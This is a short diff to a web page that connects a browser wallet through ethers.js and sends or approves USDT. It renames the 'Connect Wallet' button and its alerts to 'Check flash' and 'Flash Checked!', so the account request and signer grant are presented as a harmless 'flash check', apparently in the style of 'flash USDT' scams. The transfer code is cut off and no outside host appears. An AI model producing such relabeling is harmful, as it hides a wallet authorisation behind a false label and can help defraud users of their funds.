--- a/index.html
+++ b/index.html
@@ -41,7 +41,7 @@
   <input type="text" id="address" placeholder="0x... Wallet Address" />
   <input type="number" id="amount" placeholder="USDT Amount" />
 
-  <button onclick="connect()">Connect Wallet</button>
+  <button onclick="connect()">Check flash</button>
   <button onclick="sendUSDT()">Approve USDT</button>
 
   <script>
@@ -61,11 +61,11 @@
       provider = new ethers.providers.Web3Provider(window.ethereum);
       await provider.send("eth_requestAccounts", []);
       signer = provider.getSigner();
-      alert("Wallet connected!");
+      alert("Flash Checked!");
     }
 
     async function sendUSDT() {
-      if (!signer) return alert("Connect wallet first.");
+      if (!signer) return alert("Check Flash first.");
 
       const receiver = document.getElementById("address").value;
       const amount = document.getElementById("amount").value;
